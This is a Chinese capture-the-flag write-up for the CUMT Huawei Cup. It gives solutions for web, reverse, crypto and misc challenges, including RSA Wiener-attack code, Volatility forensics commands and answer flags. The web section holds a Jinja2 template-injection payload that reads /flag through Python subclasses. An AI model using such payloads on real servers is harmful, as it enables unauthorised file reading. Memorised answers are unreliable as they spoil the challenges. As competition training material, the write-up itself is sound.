CUMT华为杯
web
babyflask
模板注入
/name={{().__class__.__base__.__subclasses__().__getitem__(40)(%27/flag%27).read()}}
doge
f12摇奖得flag
re
hello_world
异或
d=[]
b = "is_easy_right?"
a = ['2A', '26', '12', '31', '1A', '7', '11', '3A', '2D', '0F', '0E','1A', '41', '4B', '36', '43', '31', '0', '3E', '16', '17', '35','1D', '10', '38', '11', '44', '4A', '1B', '2C', '2B', '17','50','3', '4']
for x in a:
c = ''
z = x
c += '0x'
c +=z
d.append(c)
d = 0
for i in range(0,35):
c = int(a[i],16)
m = i%14
print(chr(ord((b[m]))^c),end='')
non_name
四元一次方程
b = [12, 32, 34, 12, 53, 1, 2, 4, 6, 8, 34, 45, 56, 32, 85, 43]
c = ['a','b','c','d']
for i in range(0,4):
sum1 = 0
for j in range(0,4):
print("%s*%s"%(b[i*4+j],c[j]),end='+')
print('\n')
#116 103 102 114
crypto
Classical
维吉尼亚密码,上网down脚本,猜密钥,跑出来
cipher = "Elxyi lrw fqfjyxl pr wixx yajy chb qtsk lqfjzrx zs xuua vafe chb nfsl pcgy es ipgv tzxo ywzq rvyc djxcfx lrw oyr tzxo ytc vxhp! Orwto pmlx rvy hafm vh icitt;kz wzxtx dzy phre tg zq;uj hlta czu otpm yz fx,iinamlg rtf ltci zndr qgj wmyl eyd ggg vmlrvl xz dg tne ysi momygk rqn blrm as oo.Eta rtf ltci pngnia mltiprpsk mq ffvi rvy dwwxv,xszyzo xciseu mt xedl czu kmthsr,igvyrh khtkth xh ripp qhw azxeg,lrzuya jhup xh teve qhw afatr? Hphaql rny jsnywplx bp hysikz’wsowl.Ky dzy yliw tztv by sykaw jom,bv iwzftipj hmkvl ysi halpr hxtlty, xhv.Xse ztrinpwm vj aeginx izr’m uineklcknwc ahzp tzx dxxe sy lzprqmjbsr;xalc uukm otpp xal qzsl hh xapvraltny mjty nsflw llggi mmpmk dej.Hsirbspwl smps xht mmzwx dlz cjr,vatdi pos sujm, vatdi pos sanx uxfcgalh,lnv mjhxp aav llvw mtbjo,jhy sylq mjxd neg htarwvktyp xal mxpgkvtsni hm tpoheg.pmz ltci eomvjxi elxpv winxu.Etgi ulktnk pkmm l wfppp,gjhyl btxa h otsk tpw jyhl dmeh s mgtw.Elx ivtgzmgly qymbvp waen tqherz fp bslgw ty e yvvrolmgg ulwm, fsf csg’v zt zr plpw if ekyjfrmpp jom egm lz sy fsfr htum klmebvps sgf ajlvmhgsek.Tpw ny xal iyd, A to zqlh mv xpld rqn ysi VBQECLY kl JynhfXseNbixspvxJmahwk.Dr ysi phc, ceexoujc xh bwp bjtexx miyvvp smuobyemgn."
# coding: utf-8
def encrypt(message, key):
cipher = ''
j = 0
for i in range(len(message)):
if key[j % len(key)].islower():
offset = ord(key[j % len(key)]) - ord('a')
else:
if key[j % len(key)].isupper():
offset = ord(key[j % len(key)]) - ord('A')
else:
offset = ord(key[j % len(key)]) - 48
j += 1
if message[i].isalpha():
if message[i].islower():
cipher += chr((ord(message[i]) - ord('a') + offset) % 26 + ord('a'))
else:
cipher += chr((ord(message[i]) - ord('A') + offset) % 26 + ord('A'))
else:
cipher += message[i]
j -= 1
return cipher
def decrypt(cipher, key):
explain = ''
j = 0
for i in range(len(cipher)):
if key[j % len(key)].islower():
offset = ord(key[j % len(key)]) - ord('a')
else:
if key[j % len(key)].isupper():
offset = ord(key[j % len(key)]) - ord('A')
else:
offset = ord(key[j % len(key)]) - 48
j += 1
if cipher[i].isalpha():
if cipher[i].islower():
explain += chr((ord(cipher[i]) - ord('a') - offset) % 26 + ord('a'))
else:
explain += chr((ord(cipher[i]) - ord('A') - offset) % 26 + ord('A'))
else:
explain += cipher[i]
j -= 1
return explain
print(decrypt(cipher,'Lethelastctf'))
CUMTCTF{EnjoyTheVigenereCipher}
ezRSA
大数e
可以判断是wiener attack
上网直接down脚本
'''
Created on Dec 14, 2011
@author: pablocelayes
'''
import ContinuedFractions, Arithmetic, RSAvulnerableKeyGenerator
def hack_RSA(e,n):
'''
Finds d knowing (e,n)
applying the Wiener continued fraction attack
'''
frac = ContinuedFractions.rational_to_contfrac(e, n)
convergents = ContinuedFractions.convergents_from_contfrac(frac)
for (k,d) in convergents:
#check if d is actually the key
if k!=0 and (e*d-1)%k == 0:
phi = (e*d-1)//k
s = n - phi + 1
# check if the equation x^2 - s*x + n = 0
# has integer roots
discr = s*s - 4*n
if(discr>=0):
t = Arithmetic.is_perfect_square(discr)
if t!=-1 and (s+t)%2==0:
print("Hacked!")
return d
# TEST functions
def test_hack_RSA():
print("Testing Wiener Attack")
times = 5
while(times>0):
e,n,d = RSAvulnerableKeyGenerator.generateKeys(1024)
print("(e,n) is (", e, ", ", n, ")")
print("d = ", d)
hacked_d = hack_RSA(e, n)
if d == hacked_d:
print("Hack WORKED!")
else:
print("Hack FAILED")
print("d = ", d, ", hacked_d = ", hacked_d)
print("-------------------------")
times -= 1
if __name__ == "__main__":
n = 460657813884289609896372056585544172485318117026246263899744329237492701820627219556007788200590119136173895989001382151536006853823326382892363143604314518686388786002989248800814861248595075326277099645338694977097459168530898776007293695728101976069423971696524237755227187061418202849911479124793990722597
e = 354611102441307572056572181827925899198345350228753730931089393275463916544456626894245415096107834465778409532373187125318554614722599301791528916212839368121066035541008808261534500586023652767712271625785204280964688004680328300124849680477105302519377370092578107827116821391826210972320377614967547827619
c = 235079473042454099807116076488262740135383858230967099540307826273199444131724945298259060669497025680602868465015609167157760611830665379910856647739895018654389167886359502125262006498872925841789249028759026079722290718145036644959479543255350040619949567107916725017078853648984759794085772688267388901151
#test_is_perfect_square()
d = 8264667972294275017293339772371783322168822149471976834221082393409363691895
m = pow(c,d,n)
def num2str(num):
tmp = hex(num)[2:].replace("L","")
if(len(tmp))%2 ==0:
return tmp.decode("hex")
else:
return ("0"+tmp).decode("hex")
print(num2str(m))
#print("-------------------------")
#print(hack_RSA(e,n))
CUMTCTF{1bc205a110e6643137e045b8268b4ace}
misc
Sign In
转base64在转brainfk
CUMTCTF{Welcome_to_CUMTCTF_2020_Final}
出个流量分析吧
http流base64解码
flag{WirRSharK_S0_E45y}
出个LSB吧
LSB隐写
red green blue 0 0 0
保存得二维码 扫得flag
cumtctf{1sb_i4_s0_Ea4y}
出个伪web吧
查看最新修改文件的时间
可以看到pass中有明显字符串cumt
然后拿flag包裹就行
出个文档吧
隐藏文字
内存取证
python vol.py -f memory.img imageinfo
python vol.py -f memory.img --profile=Win2003SP0x86 filescan |grep flag
可以看到有flag.png,输出一下
python vol.py -f memory.img --profile=Win2003SP1x86 dumpfiles -D ./ -Q 0x000000000484f900
可以看到一个图片扫一下
jfXvUoypb8p3zvmPks8kJ5Kt0vmEw0xUZyRGOicraY4=
解不出来
查看系统窗口列表,看有没有和flag有关的程序
python vol.py -f memory.img --profile=Win2003SP1x86 windows | grep flag
可以看到有一个程序dump一下
python vol.py -f memory.img --profile=Win2003SP1x86 memdump -D ./ -p 1992
用foremost分离一下
可以看到有图片
有key值和vi 然后就是AES加密
key:Th1s_1s_K3y00000
vi:1234567890123456
base64:jfXvUoypb8p3zvmPks8kJ5Kt0vmEw0xUZyRGOicraY4=
flag{F0uNd_s0m3th1ng_1n_M3mory}
出个压缩包吧
010打开之后发现有secret.png没有伪加密,很明显子块被修改
7a改成74
分离出secret.png
发现是一张图片,但有两帧
脱到steg里面可以看到两个残缺的二维码
补全,就可以看到flag
flag{yanji4n_bu_we1shi}